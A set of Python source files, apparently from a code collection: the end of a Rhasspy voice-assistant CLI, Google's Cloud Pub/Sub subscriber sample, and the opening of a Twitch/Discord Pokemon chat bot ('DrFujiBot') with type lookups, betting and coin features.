else:
# Send all at once
audio_data = wav_file.readframes(wav_file.getnframes())
_send_frame(core, topic, audio_data, rate, width, channels)
print(wav_path)
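# Worked example of the chunking above (audio format assumed for illustration): for a
# 16 kHz, 16-bit mono WAV and the default --frames=480, chunk_size = 480 * 2 * 1 = 960
# bytes per MQTT message (roughly 30 ms of audio). One second of --silence-before then
# adds int((1.0 * 16000 * 2 * 1) / 960) = 33 zero-filled chunks ahead of the real audio.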
# -----------------------------------------------------------------------------
# text2wav: speak sentence and output WAV
# -----------------------------------------------------------------------------
async def text2wav(core: RhasspyCore, profile: Profile, args: Any) -> None:
"""Speak a sentence and output WAV data"""
result = await core.speak_sentence(args.sentence)
sys.stdout.buffer.write(result.wav_data)
# -----------------------------------------------------------------------------
# text2speech: speak sentences
# -----------------------------------------------------------------------------
async def text2speech(core: RhasspyCore, profile: Profile, args: Any) -> None:
"""Speak sentences"""
sentences = args.sentences
if not sentences:
sentences = sys.stdin
for sentence in sentences:
sentence = sentence.strip()
await core.speak_sentence(sentence)
# -----------------------------------------------------------------------------
# sleep: wait for wake word
# -----------------------------------------------------------------------------
async def sleep(core: RhasspyCore, profile: Profile, args: Any) -> None:
"""Wait for wake word to be spoken"""
result = await core.wakeup_and_wait()
if isinstance(result, WakeWordDetected):
print(result.name)
else:
print("") # not detected
# -----------------------------------------------------------------------------
# download: download profile files
# -----------------------------------------------------------------------------
async def download(core: RhasspyCore, profile: Profile, args: Any) -> None:
"""Download necessary profile files"""
await core.download_profile(delete=args.delete)
print("OK")
# -----------------------------------------------------------------------------
# check: check profile files
# -----------------------------------------------------------------------------
async def check(core: RhasspyCore, profile: Profile, args: Any) -> None:
"""Verify that profile files are downloaded"""
missing_files = core.check_profile()
json.dump(missing_files, sys.stdout, indent=4)
# -----------------------------------------------------------------------------
if __name__ == "__main__":
loop = asyncio.get_event_loop()
try:
loop.run_until_complete(main())
finally:
loop.close()
|
subscriber.py
|
#!/usr/bin/env python
# Copyright 2019 Google Inc. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""This application demonstrates how to perform basic operations on
subscriptions with the Cloud Pub/Sub API.
For more information, see the README.md under /pubsub and the documentation
at https://cloud.google.com/pubsub/docs.
"""
import argparse
def list_subscriptions_in_topic(project_id, topic_name):
"""Lists all subscriptions for a given topic."""
# [START pubsub_list_topic_subscriptions]
from google.cloud import pubsub_v1
# TODO project_id = "Your Google Cloud Project ID"
# TODO topic_name = "Your Pub/Sub topic name"
publisher = pubsub_v1.PublisherClient()
topic_path = publisher.topic_path(project_id, topic_name)
for subscription in publisher.list_topic_subscriptions(topic_path):
print(subscription)
# [END pubsub_list_topic_subscriptions]
def list_subscriptions_in_project(project_id):
"""Lists all subscriptions in the current project."""
# [START pubsub_list_subscriptions]
from google.cloud import pubsub_v1
# TODO project_id = "Your Google Cloud Project ID"
subscriber = pubsub_v1.SubscriberClient()
project_path = subscriber.project_path(project_id)
for subscription in subscriber.list_subscriptions(project_path):
print(subscription.name)
# [END pubsub_list_subscriptions]
def create_subscription(project_id, topic_name, subscription_name):
"""Create a new pull subscription on the given topic."""
# [START pubsub_create_pull_subscription]
from google.cloud import pubsub_v1
# TODO project_id = "Your Google Cloud Project ID"
# TODO topic_name = "Your Pub/Sub topic name"
# TODO subscription_name = "Your Pub/Sub subscription name"
subscriber = pubsub_v1.SubscriberClient()
topic_path = subscriber.topic_path(project_id, topic_name)
subscription_path = subscriber.subscription_path(
project_id, subscription_name)
subscription = subscriber.create_subscription(
subscription_path, topic_path)
print('Subscription created: {}'.format(subscription))
# [END pubsub_create_pull_subscription]
def create_push_subscription(project_id,
topic_name,
subscription_name,
endpoint):
"""Create a new push subscription on the given topic."""
# [START pubsub_create_push_subscription]
from google.cloud import pubsub_v1
# TODO project_id = "Your Google Cloud Project ID"
# TODO topic_name = "Your Pub/Sub topic name"
# TODO subscription_name = "Your Pub/Sub subscription name"
# TODO endpoint = "https://my-test-project.appspot.com/push"
subscriber = pubsub_v1.SubscriberClient()
topic_path = subscriber.topic_path(project_id, topic_name)
subscription_path = subscriber.subscription_path(
project_id, subscription_name)
push_config = pubsub_v1.types.PushConfig(
push_endpoint=endpoint)
subscription = subscriber.create_subscription(
subscription_path, topic_path, push_config)
print('Push subscription created: {}'.format(subscription))
print('Endpoint for subscription is: {}'.format(endpoint))
# [END pubsub_create_push_subscription]
def delete_subscription(project_id, subscription_name):
"""Deletes an existing Pub/Sub topic."""
# [START pubsub_delete_subscription]
from google.cloud import pubsub_v1
# TODO project_id = "Your Google Cloud Project ID"
# TODO subscription_name = "Your Pub/Sub subscription name"
subscriber = pubsub_v1.SubscriberClient()
subscription_path = subscriber.subscription_path(
project_id, subscription_name)
subscriber.delete_subscription(subscription_path)
print('Subscription deleted: {}'.format(subscription_path))
# [END pubsub_delete_subscription]
def update_subscription(project_id, subscription_name, endpoint):
"""
Updates an existing Pub/Sub subscription's push endpoint URL.
Note that certain properties of a subscription, such as
its topic, are not modifiable.
"""
# [START pubsub_update_push_configuration]
from google.cloud import pubsub_v1
# TODO project_id = "Your Google Cloud Project ID"
# TODO topic_name = "Your Pub/Sub topic name"
# TODO subscription_name = "Your Pub/Sub subscription name"
# TODO endpoint = "https://my-test-project.appspot.com/push"
subscriber = pubsub_v1.SubscriberClient()
subscription_path = subscriber.subscription_path(
project_id, subscription_name)
push_config = pubsub_v1.types.PushConfig(
push_endpoint=endpoint)
subscription = pubsub_v1.types.Subscription(
name=subscription_path,
push_config=push_config)
update_mask = {
'paths': {
'push_config',
}
}
subscriber.update_subscription(subscription, update_mask)
result = subscriber.get_subscription(subscription_path)
print('Subscription updated: {}'.format(subscription_path))
print('New endpoint for subscription is: {}'.format(
result.push_config))
# [END pubsub_update_push_configuration]
def receive_messages(project_id, subscription_name):
"""Receives messages from a pull subscription."""
# [START pubsub_subscriber_async_pull]
# [START pubsub_quickstart_subscriber]
import time
from google.cloud import pubsub_v1
# TODO project_id = "Your Google Cloud Project ID"
# TODO subscription_name = "Your Pub/Sub subscription name"
subscriber = pubsub_v1.SubscriberClient()
# The `subscription_path` method creates a fully qualified identifier
# in the form `projects/{project_id}/subscriptions/{subscription_name}`
subscription_path = subscriber.subscription_path(
project_id, subscription_name)
def callback(message):
print('Received message: {}'.format(message))
message.ack()
subscriber.subscribe(subscription_path, callback=callback)
# The subscriber is non-blocking. We must keep the main thread from
# exiting to allow it to process messages asynchronously in the background.
print('Listening for messages on {}'.format(subscription_path))
while True:
time.sleep(60)
# [END pubsub_subscriber_async_pull]
# [END pubsub_quickstart_subscriber]
def receive_messages_with_custom_attributes(project_id, subscription_name):
"""Receives messages from a pull subscription."""
# [START pubsub_subscriber_sync_pull_custom_attributes]
# [START pubsub_subscriber_async_pull_custom_attributes]
import time
from google.cloud import pubsub_v1
# TODO project_id = "Your Google Cloud Project ID"
# TODO subscription_name = "Your Pub/Sub subscription name"
subscriber = pubsub_v1.SubscriberClient()
subscription_path = subscriber.subscription_path(
project_id, subscription_name)
def callback(message):
print('Received message: {}'.format(message.data))
if message.attributes:
print('Attributes:')
for key in message.attributes:
value = message.attributes.get(key)
print('{}: {}'.format(key, value))
message.ack()
subscriber.subscribe(subscription_path, callback=callback)
# The subscriber is non-blocking, so we must keep the main thread from
# exiting to allow it to process messages in the background.
print('Listening for messages on {}'.format(subscription_path))
while True:
time.sleep(60)
# [END pubsub_subscriber_async_pull_custom_attributes]
# [END pubsub_subscriber_sync_pull_custom_attributes]
def receive_messages_with_flow_control(project_id, subscription_name):
"""Receives messages from a pull subscription with flow control."""
# [START pubsub_subscriber_flow_settings]
import time
from google.cloud import pubsub_v1
# TODO project_id = "Your Google Cloud Project ID"
# TODO subscription_name = "Your Pub/Sub subscription name"
subscriber = pubsub_v1.SubscriberClient()
subscription_path = subscriber.subscription_path(
project_id, subscription_name)
def callback(message):
print('Received message: {}'.format(message.data))
message.ack()
# Limit the subscriber to only have ten outstanding messages at a time.
flow_control = pubsub_v1.types.FlowControl(max_messages=10)
subscriber.subscribe(
subscription_path, callback=callback, flow_control=flow_control)
# The subscriber is non-blocking, so we must keep the main thread from
# exiting to allow it to process messages in the background.
print('Listening for messages on {}'.format(subscription_path))
while True:
time.sleep(60)
# [END pubsub_subscriber_flow_settings]
def synchronous_pull(project_id, subscription_name):
"""Pulling messages synchronously."""
# [START pubsub_subscriber_sync_pull]
from google.cloud import pubsub_v1
# TODO project_id = "Your Google Cloud Project ID"
# TODO subscription_name = "Your Pub/Sub subscription name"
subscriber = pubsub_v1.SubscriberClient()
subscription_path = subscriber.subscription_path(
project_id, subscription_name)
NUM_MESSAGES = 3
# The subscriber pulls a specific number of messages.
response = subscriber.pull(subscription_path, max_messages=NUM_MESSAGES)
ack_ids = []
for received_message in response.received_messages:
print("Received: {}".format(received_message.message.data))
ack_ids.append(received_message.ack_id)
# Acknowledges the received messages so they will not be sent again.
subscriber.acknowledge(subscription_path, ack_ids)
print('Received and acknowledged {} messages. Done.'.format(
len(response.received_messages)))
# [END pubsub_subscriber_sync_pull]
def synchronous_pull_with_lease_management(project_id, subscription_name):
"""Pulling messages synchronously with lease management"""
# [START pubsub_subscriber_sync_pull_with_lease]
import logging
import multiprocessing
import random
import time
from google.cloud import pubsub_v1
# TODO project_id = "Your Google Cloud Project ID"
# TODO subscription_name = "Your Pub/Sub subscription name"
subscriber = pubsub_v1.SubscriberClient()
subscription_path = subscriber.subscription_path(
project_id, subscription_name)
NUM_MESSAGES = 2
ACK_DEADLINE = 30
SLEEP_TIME = 10
# The subscriber pulls a specific number of messages.
response = subscriber.pull(subscription_path, max_messages=NUM_MESSAGES)
multiprocessing.log_to_stderr()
logger = multiprocessing.get_logger()
logger.setLevel(logging.INFO)
def worker(msg):
"""Simulates a long-running process."""
RUN_TIME = random.randint(1, 60)
logger.info('{}: Running {} for {}s'.format(
time.strftime("%X", time.gmtime()), msg.message.data, RUN_TIME))
time.sleep(RUN_TIME)
# `processes` stores process as key and ack id and message as values.
processes = dict()
for message in response.received_messages:
process = multiprocessing.Process(target=worker, args=(message,))
processes[process] = (message.ack_id, message.message.data)
process.start()
while processes:
for process in list(processes):
ack_id, msg_data = processes[process]
# If the process is still running, reset the ack deadline as
# specified by ACK_DEADLINE once every while as specified
# by SLEEP_TIME.
if process.is_alive():
# `ack_deadline_seconds` must be between 10 and 600.
subscriber.modify_ack_deadline(
subscription_path,
[ack_id],
ack_deadline_seconds=ACK_DEADLINE)
logger.info('{}: Reset ack deadline for {} for {}s'.format(
time.strftime("%X", time.gmtime()),
msg_data, ACK_DEADLINE))
# If the process is finished, acknowledge it using `ack_id`.
else:
subscriber.acknowledge(subscription_path, [ack_id])
logger.info("{}: Acknowledged {}".format(
time.strftime("%X", time.gmtime()), msg_data))
processes.pop(process)
# If there are still processes running, sleep before checking again.
if processes:
time.sleep(SLEEP_TIME)
print('Received and acknowledged {} messages. Done.'.format(
len(response.received_messages)))
# [END pubsub_subscriber_sync_pull_with_lease]
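# Timing note for the loop above: with ACK_DEADLINE = 30 and SLEEP_TIME = 10, each live
# worker has its deadline pushed back to 30 s roughly every 10 s (plus the time spent
# iterating over `processes`), so the lease is refreshed well before it can expire; the
# deadline passed to modify_ack_deadline must stay within the allowed 10-600 s range.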
def listen_for_errors(project_id, subscription_name):
"""Receives messages and catches errors from a pull subscription."""
# [START pubsub_subscriber_error_listener]
from google.cloud import pubsub_v1
# TODO project_id = "Your Google Cloud Project ID"
# TODO subscription_name = "Your Pubsub subscription name"
subscriber = pubsub_v1.SubscriberClient()
subscription_path = subscriber.subscription_path(
project_id, subscription_name)
def callback(message):
print('Received message: {}'.format(message))
message.ack()
future = subscriber.subscribe(subscription_path, callback=callback)
# Blocks the thread while messages are coming in through the stream. Any
# exceptions that crop up on the thread will be set on the future.
try:
# When timeout is unspecified, the result method waits indefinitely.
future.result(timeout=30)
except Exception as e:
print(
'Listening for messages on {} threw an Exception: {}.'.format(
subscription_name, e))
# [END pubsub_subscriber_error_listener]
if __name__ == '__main__':
parser = argparse.ArgumentParser(
description=__doc__,
formatter_class=argparse.RawDescriptionHelpFormatter
)
parser.add_argument('project_id', help='Your Google Cloud project ID')
subparsers = parser.add_subparsers(dest='command')
list_in_topic_parser = subparsers.add_parser(
'list_in_topic', help=list_subscriptions_in_topic.__doc__)
list_in_topic_parser.add_argument('topic_name')
list_in_project_parser = subparsers.add_parser(
'list_in_project', help=list_subscriptions_in_project.__doc__)
create_parser = subparsers.add_parser(
'create', help=create_subscription.__doc__)
create_parser.add_argument('topic_name')
create_parser.add_argument('subscription_name')
create_push_parser = subparsers.add_parser(
'create-push', help=create_push_subscription.__doc__)
create_push_parser.add_argument('topic_name')
create_push_parser.add_argument('subscription_name')
create_push_parser.add_argument('endpoint')
delete_parser = subparsers.add_parser(
'delete', help=delete_subscription.__doc__)
delete_parser.add_argument('subscription_name')
update_parser = subparsers.add_parser(
'update', help=update_subscription.__doc__)
update_parser.add_argument('subscription_name')
update_parser.add_argument('endpoint')
receive_parser = subparsers.add_parser(
'receive', help=receive_messages.__doc__)
receive_parser.add_argument('subscription_name')
receive_with_custom_attributes_parser = subparsers.add_parser(
'receive-custom-attributes',
help=receive_messages_with_custom_attributes.__doc__)
receive_with_custom_attributes_parser.add_argument('subscription_name')
receive_with_flow_control_parser = subparsers.add_parser(
'receive-flow-control',
help=receive_messages_with_flow_control.__doc__)
receive_with_flow_control_parser.add_argument('subscription_name')
synchronous_pull_parser = subparsers.add_parser(
'receive-synchronously',
help=synchronous_pull.__doc__)
synchronous_pull_parser.add_argument('subscription_name')
synchronous_pull_with_lease_management_parser = subparsers.add_parser(
'receive-synchronously-with-lease',
help=synchronous_pull_with_lease_management.__doc__)
synchronous_pull_with_lease_management_parser.add_argument(
'subscription_name')
listen_for_errors_parser = subparsers.add_parser(
'listen_for_errors', help=listen_for_errors.__doc__)
listen_for_errors_parser.add_argument('subscription_name')
args = parser.parse_args()
if args.command == 'list_in_topic':
list_subscriptions_in_topic(args.project_id, args.topic_name)
elif args.command == 'list_in_project':
list_subscriptions_in_project(args.project_id)
elif args.command == 'create':
create_subscription(
args.project_id, args.topic_name, args.subscription_name)
elif args.command == 'create-push':
create_push_subscription(
args.project_id,
args.topic_name,
args.subscription_name,
args.endpoint)
elif args.command == 'delete':
delete_subscription(
args.project_id, args.subscription_name)
elif args.command == 'update':
update_subscription(
args.project_id, args.subscription_name, args.endpoint)
elif args.command == 'receive':
receive_messages(args.project_id, args.subscription_name)
elif args.command == 'receive-custom-attributes':
receive_messages_with_custom_attributes(
args.project_id, args.subscription_name)
elif args.command == 'receive-flow-control':
receive_messages_with_flow_control(
args.project_id, args.subscription_name)
elif args.command == 'receive-synchronously':
synchronous_pull(
args.project_id, args.subscription_name)
elif args.command == 'receive-synchronously-with-lease':
synchronous_pull_with_lease_management(
args.project_id, args.subscription_name)
elif args.command == 'listen_for_errors':
listen_for_errors(args.project_id, args.subscription_name)
|
drfujibot.py
|
import sys
import socket
import datetime
import urllib
import glob
import random
import threading
import types
import time
import drfujibot_irc.bot
import drfujibot_irc.strings
import os
import drfujibot_pykemon.exceptions
import drfujibot_pykemon.request
import drfujibot_pykemon.api
import re
import json
import logging
import discord
import asyncio
import multiprocessing
import operator
import iso8601
import traceback
import copy
import requests
#import requests_cache
from bs4 import BeautifulSoup
from datetime import timedelta
from whoosh.spelling import ListCorrector
from anagram import Anagram
import wikipedia
logger = logging.getLogger(__name__)
handler = logging.StreamHandler(stream=sys.stdout)
logger.addHandler(handler)
def handle_exception(exc_type, exc_value, exc_traceback):
if issubclass(exc_type, KeyboardInterrupt):
sys.__excepthook__(exc_type, exc_value, exc_traceback)
return
logger.error("Uncaught exception", exc_info=(exc_type, exc_value, exc_traceback))
output = str(exc_type) + " " + str(exc_value) + " " + ''.join(traceback.format_tb(exc_traceback)) + "\n"
output += '---------------------------------------------------------\n'
with open('exceptions.log', 'a') as f:
f.write(sys.argv[1] + "\n")
f.write(output)
os._exit(1)
sys.excepthook = handle_exception
g_c = None
g_whisperMode = False
g_bot = None
def fix_pokemon_name(name):
if name.lower() == "pumpkaboo":
name = "pumpkaboo-average"
elif name.lower() == "gourgeist":
name = "gourgeist-average"
elif name.lower() == "darmanitan":
name = "darmanitan-standard"
elif name.lower() == "deoxys":
name = "deoxys-speed"
elif name.lower() == "meowstic":
name = "meowstic-male"
elif name.lower() == "basculin":
name = "basculin-red-striped"
elif name.lower() == "wormadam":
name = "wormadam-plant"
elif name.lower() == "keldeo":
name = "keldeo-ordinary"
elif name.lower() == "wishiwashi":
name = "wishiwashi-solo"
elif name.lower() == "meloetta":
name = "meloetta-aria"
return name
def fix_z_move(name):
if "breakneck-blitz" == name.lower():
name = "breakneck-blitz--physical"
elif "all-out-pummeling" == name.lower():
name = "all-out-pummeling--physical"
elif "supersonic-skystrike" == name.lower():
name = "supersonic-skystrike--physical"
elif "acid-downpour" == name.lower():
name = "acid-downpour--physical"
elif "tectonic-rage" == name.lower():
name = "tectonic-rage--physical"
elif "continental-crush" == name.lower():
name = "continental-crush--physical"
elif "savage-spin-out" == name.lower():
name = "savage-spin-out--physical"
elif "never-ending-nightmare" == name.lower():
name = "never-ending-nightmare--physical"
elif "corkscrew-crash" == name.lower():
name = "corkscrew-crash--physical"
elif "inferno-overdrive" == name.lower():
name = "inferno-overdrive--physical"
elif "hydro-vortex" == name.lower():
name = "hydro-vortex--physical"
elif "bloom-doom" == name.lower():
name = "bloom-doom--physical"
elif "gigavolt-havoc" == name.lower():
name = "gigavolt-havoc--physical"
elif "shattered-psyche" == name.lower():
name = "shattered-psyche--physical"
elif "subzero-slammer" == name.lower():
name = "subzero-slammer--physical"
elif "devastating-drake" == name.lower():
name = "devastating-drake--physical"
elif "black-hole-eclipse" == name.lower():
name = "black-hole-eclipse--physical"
elif "twinkle-tackle" == name.lower():
name = "twinkle-tackle--physical"
return name
def get_coin_balances(source_user):
output = source_user + " : You have "
with open('PokemonChallenges_coins.json', 'r') as coin_file:
coin_info = json.load(coin_file)
coins = coin_info.get('coins')
if None != coins:
if source_user in coins.keys():
output += str(int(coins[source_user]))
output += " coins"
else:
"0 coins"
return output
def get_weaknesses(type1, type2):
weaknesses = []
try:
t1 = drfujibot_pykemon.api.get(type=type1)
t2 = None
if type2:
t2 = drfujibot_pykemon.api.get(type=type2)
weaknesses = [w.get('name') for w in t1.double_damage_from]
if t2:
for w in t2.double_damage_from:
weaknesses.append(w.get('name'))
resistances = [r.get('name') for r in t1.half_damage_from]
if t2:
for r in t2.half_damage_from:
resistances.append(r.get('name'))
no_dmg_types = [t.get('name') for t in t1.no_damage_from]
if t2:
for t in t2.no_damage_from:
no_dmg_types.append(t.get('name'))
# Take out no-damage types outright.
weaknesses = [w for w in weaknesses if w not in no_dmg_types]
# Reduce weakness instance by one for each resistance.
for r in resistances:
if r in weaknesses:
weaknesses.remove(r)
except drfujibot_pykemon.exceptions.ResourceNotFoundError:
print("Type(s) not found.")
except:
print("Unexpected error: " + str(sys.exc_info()[0]))
return weaknesses
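# Worked example of the bookkeeping above (standard type chart, e.g. a Water/Ground Pokemon):
# the raw double-damage list is [grass, electric] from Water plus [water, grass, ice] from
# Ground; Ground's immunity removes electric outright, and the resistances water and ice each
# cancel one matching entry, leaving [grass, grass] -- i.e. a double (4x) weakness to Grass.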
def get_resistances(type1, type2):
resistances = []
try:
t1 = drfujibot_pykemon.api.get(type=type1)
t2 = None
if type2:
t2 = drfujibot_pykemon.api.get(type=type2)
weaknesses = [w.get('name') for w in t1.double_damage_from]
if t2:
for w in t2.double_damage_from:
weaknesses.append(w.get('name'))
resistances = [r.get('name') for r in t1.half_damage_from]
if t2:
for r in t2.half_damage_from:
resistances.append(r.get('name'))
no_dmg_types = [t.get('name') for t in t1.no_damage_from]
if t2:
for t in t2.no_damage_from:
no_dmg_types.append(t.get('name'))
# Take out no-damage types outright.
resistances = [r for r in resistances if r not in no_dmg_types]
# Reduce resistance instance by one for each weakness.
for w in weaknesses:
if w in resistances:
resistances.remove(w)
except drfujibot_pykemon.exceptions.ResourceNotFoundError:
print("Type(s) not found.")
except:
print("Unexpected error: " + str(sys.exc_info()[0]))
return resistances
def get_immunities(type1, type2):
immunities = []
try:
t1 = drfujibot_pykemon.api.get(type=type1)
t2 = None
if type2:
t2 = drfujibot_pykemon.api.get(type=type2)
immunities = [t.get('name') for t in t1.no_damage_from]
if t2:
for t in t2.no_damage_from:
immunities.append(t.get('name'))
except drfujibot_pykemon.exceptions.ResourceNotFoundError:
self.output_msg(c, "Type(s) not found.", source_user)
except:
print("Unexpected error: " + str(sys.exc_info()[0]))
return immunities
def is_global_command(line):
global_commands = [
"!deaths",
"!sprite",
"!fallen",
"!bet",
"!coins",
"!balance",
"!honestly",
"!daily",
"!song",
"!uptime",
"!fixit",
"!quote",
"!elo",
"!leaderboard",
"!shaq",
"!combo",
"!attempt",
]
for c in global_commands:
if line.startswith(c):
#print("Global command permitted")
return True
return False
def parse_time(time_str):
regex = re.compile(r'((?P<hours>\d+?)h)?((?P<minutes>\d+?)m)?((?P<seconds>\d+?)s)?')
parts = regex.match(time_str)
if not parts:
return
parts = parts.groupdict()
time_params = {}
for (name, param) in parts.items():
if param:
time_params[name] = int(param)
return timedelta(**time_params)
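# Illustrative examples of the format accepted above:
#   parse_time("1h30m") -> timedelta(hours=1, minutes=30)
#   parse_time("45s")   -> timedelta(seconds=45)
# Units may be omitted, but those present must appear in h, m, s order.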
def sort_by_coverage(mv):
super_effective_types = []
types = ['normal', 'fire', 'fighting', 'water', 'flying', 'grass', 'poison', 'electric', 'ground', 'psychic', 'rock', 'ice', 'bug', 'dragon', 'ghost', 'dark', 'steel', 'fairy']
try:
for t in types:
t1 = drfujibot_pykemon.api.get(type=t)
weaknesses = [w.get('name') for w in t1.double_damage_from]
if mv.type in weaknesses:
super_effective_types.append(t)
except drfujibot_pykemon.exceptions.ResourceNotFoundError:
self.output_msg(c, "Type(s) not found.", source_user)
except:
print("Unexpected error: " + str(sys.exc_info()[0]))
print(mv.name + " " + mv.type + " SE against " + str(super_effective_types))
return len(super_effective_types)
def genNameToNum(name):
gen = 0
if "red-blue" in name or "yellow" in name:
gen = 1
elif "gold-silver" in name or "crystal" in name:
gen = 2
elif "ruby-sapphire" in name or "emerald" in name or "firered-leafgreen" in name:
gen = 3
elif "diamond-pearl" in name or "platinum" in name or "heartgold-soulsilver" in name:
gen = 4
elif "black-white" in name or "black-2-white-2" in name:
gen = 5
elif "x-y" in name or "omega-ruby-alpha-sapphire" in name:
gen = 6
elif "sun-moon" in name:
gen = 7
return gen
def getRegionForGame(game):
region = ''
if 'red' == game or 'blue' == game or 'yellow' == game or 'leaf-green' == game or 'fire-red' == game:
region = 'kanto'
elif 'gold' == game or 'silver' == game or 'crystal' == game or 'heart-gold' == game or 'soul-silver' == game:
region = 'johto'
elif 'ruby' == game or 'sapphire' == game or 'emerald' == game or 'omega-ruby' == game or 'alpha-sapphire' == game:
region = 'hoenn'
elif 'diamond' == game or 'pearl' == game or 'platinum' == game:
region = 'sinnoh'
elif 'black' == game or 'white' == game or 'black-2' == game or 'white-2' == game:
region = 'unova'
elif 'x' == game or 'y' == game:
region = 'kalos'
elif 'sun' == game or 'moon' == game:
region = 'alola'
return region
def find_chain(chain, name):
if name == chain.get('species').get('name'):
return chain
else:
for c in chain.get('evolves_to'):
result = find_chain(c, name)
if result:
return result
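# Illustrative shape of the `chain` argument (it mirrors the evolution-chain structure the
# code reads; the species names are just an example): find_chain walks 'evolves_to'
# recursively and returns the first node whose 'species' name matches, e.g.
#   chain = {'species': {'name': 'bulbasaur'},
#            'evolves_to': [{'species': {'name': 'ivysaur'},
#                            'evolves_to': [{'species': {'name': 'venusaur'}, 'evolves_to': []}]}]}
#   find_chain(chain, 'ivysaur')  # -> the ivysaur node, whose 'evolves_to' lists venusaur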
def get_fuji_config_value(key):
result = None
with open('DrFujiBot_config.json', 'r') as f:
config = json.load(f)
result = config.get(key)
return result
class DrFujiBot(drfujibot_irc.bot.SingleServerIRCBot):
def __init__(self, username, permitted_users, moderators, whisperMode, game, bot_type):
self.game = game
self.bot_type = bot_type
self.whisperMode = whisperMode
twitch_oauth_token = get_fuji_config_value('twitch_oauth_token')
twitch_username = get_fuji_config_value('twitch_username')
drfujibot_irc.bot.SingleServerIRCBot.__init__(self, [("irc.chat.twitch.tv" if True == self.whisperMode else "irc.twitch.tv", 6667, twitch_oauth_token)], twitch_username, twitch_username)
self.channel = "#" + username.lower()
self.username = username
self.start_time = datetime.datetime.now()
self.previous_users = None
if bot_type and bot_type == 'discord':
users_file = 'whisper_discord_users.json'
else:
users_file = 'whisper_users.json'
with open(users_file, 'r') as config_file2:
self.previous_users = json.load(config_file2)
self.bee = []
with open('bee.txt', 'r') as bee_file:
for line in bee_file:
for word in line.split():
self.bee.append(word)
self.shaq = []
with open('shaq.txt', 'r') as shaq_file:
for line in shaq_file:
for word in line.split():
self.shaq.append(word)
self.bee_index = 0
self.shaq_index = 0
self.deaths = 0
# For betting
self.open_events = {}
self.open_event_rewards = {}
self.closed_events = {}
self.last_line = ""
self.same_counter = 0
configname = ""
self.config = None
if bot_type and bot_type == 'discord':
configname = username + '_discord.json'
else:
configname = username + '.json'
coins_config_name = username + '_coins.json'
with open(configname, 'r') as config_file:
self.config = json.load(config_file)
if self.config:
self.bee_index = self.config['bee_index']
if self.config.get('shaq_index'):
self.shaq_index = self.config['shaq_index']
else:
self.shaq_index = 0
if self.config.get('handle_pcwe'):
self.pcwe_thread = threading.Thread(target=self.pcwe_loop)
self.pcwe_thread.start()
if self.config.get('deaths'):
self.deaths = self.config.get('deaths')
self.meme_mode = False
if self.config.get('meme_mode'):
self.meme_mode = self.config.get('meme_mode')
if self.config.get('fallen'):
# Keys are names, values are number of respects paid
self.fallen = self.config.get('fallen')
else:
self.fallen = {}
if self.config.get('fallen_timestamps'):
# Keys are names, values are timestamps of final respects
self.fallen_timestamps = self.config.get('fallen_timestamps')
else:
self.fallen_timestamps = {}
if self.config.get('open_events'):
# event name, bet dict
for (k, v) in self.config['open_events'].items():
self.open_events[k] = v
if None == self.config.get('open_event_rewards'):
self.config['open_event_rewards'] = {}
if self.config.get('open_event_rewards'):
# event name, reward
for (k, v) in self.config['open_event_rewards'].items():
self.open_event_rewards[k] = v
if self.config.get('closed_events'):
# event name, bet dict
for (k, v) in self.config['closed_events'].items():
self.closed_events[k] = v
if None == self.config.get('extra_commands'):
self.config['extra_commands'] = {}
if None == self.config.get('extra_commands_on'):
self.config['extra_commands_on'] = False
if None == self.config.get('winners'):
self.config['winners'] = {}
if None != self.config.get('timed_messages'):
self.timed_message_thread = threading.Thread(target=self.timed_message_loop)
self.timed_message_thread.start()
if None == self.config.get('pokeapi_url'):
self.config['pokeapi_url'] = ''
if None == self.config.get('auto_shoutout'):
self.config['auto_shoutout'] = []
if None == self.config.get('last_auto_shoutout'):
self.config['last_auto_shoutout'] = {}
if None == self.config.get('shoutout_messages'):
self.config['shoutout_messages'] = []
if None == self.config.get('command_whitelist'):
self.config['command_whitelist'] = []
if None == self.config.get('quotes'):
self.config['quotes'] = {}
else:
if isinstance(self.config['quotes'], list):
self.config['quotes'] = {}
if None == self.config.get('run_data'):
self.config['run_data'] = {}
if None == self.config.get('highest_combo'):
self.config['highest_combo'] = (0, "")
if None == self.config.get('current_run'):
self.config['current_run'] = ""
else:
if None != self.config['run_data'].get(self.config['current_run']):
if None != self.config['run_data'][self.config['current_run']].get('deaths'):
self.deaths = self.config['run_data'][self.config['current_run']]['deaths']
if None != self.config['run_data'][self.config['current_run']].get('closed_events'):
self.config['closed_events'] = self.config['run_data'][self.config['current_run']]['closed_events']
self.bet_config = {}
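        # bet_config.json shape (inferred from how it is read below), roughly:
        #   { "events": { "<event>": { "outcomes": { "<result>": ... },
        #                              "mappings": { "<result>": ["<aliased bet>", ...] } } } }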
with open('bet_config.json', 'r') as config_file:
self.bet_config = json.load(config_file)
self.coin_data = {}
self.foundCoinFile = True
try:
with open(coins_config_name, 'r') as config_file:
self.coin_data = json.load(config_file)
if None == self.coin_data.get('last_daily_bonus'):
self.coin_data['last_daily_bonus'] = {}
except:
self.foundCoinFile = False
if self.foundCoinFile:
self.coin_lock = threading.Lock()
            # Start the coin thread only for the main (non-whisper, non-Discord) bot instance
            startCoinThread = not self.whisperMode and bot_type != 'discord'
            if startCoinThread:
self.coin_thread = threading.Thread(target=self.coin_loop)
self.coin_thread.start()
# Keys are names, values are lists of users that paid respects
self.deaths_dict = {}
# Keys are names, values are timestamps
self.current_deaths = {}
self.extra_command_cooldown = {}
self.permissions = True
self.permitted_users = []
self.permitted_users.append(username.lower())
for u in permitted_users:
self.permitted_users.append(u.lower())
self.moderators = []
if None != moderators:
for u in moderators:
self.moderators.append(u.lower())
self.pokemon_corrector = None
with open('pokemon_dictionary.txt', 'r') as pokemon_dict:
lines = pokemon_dict.readlines()
lines = [line.replace('\n', '') for line in lines]
self.pokemon_corrector = ListCorrector(lines)
self.move_corrector = None
with open('move_dictionary.txt', 'r') as move_dict:
lines = move_dict.readlines()
lines = [line.replace('\n', '') for line in lines]
self.move_corrector = ListCorrector(lines)
self.last_lines = []
self.shoutouts_done = []
self.pcce = {}
self.pcce['coins'] = {}
with open('PCCE.json', 'r') as config_file:
self.pcce = json.load(config_file)
self.battle_room = ""
self.ez = False
self.ez_count = 0
self.ez_start = time.time()
def get_current_run_data(self, key):
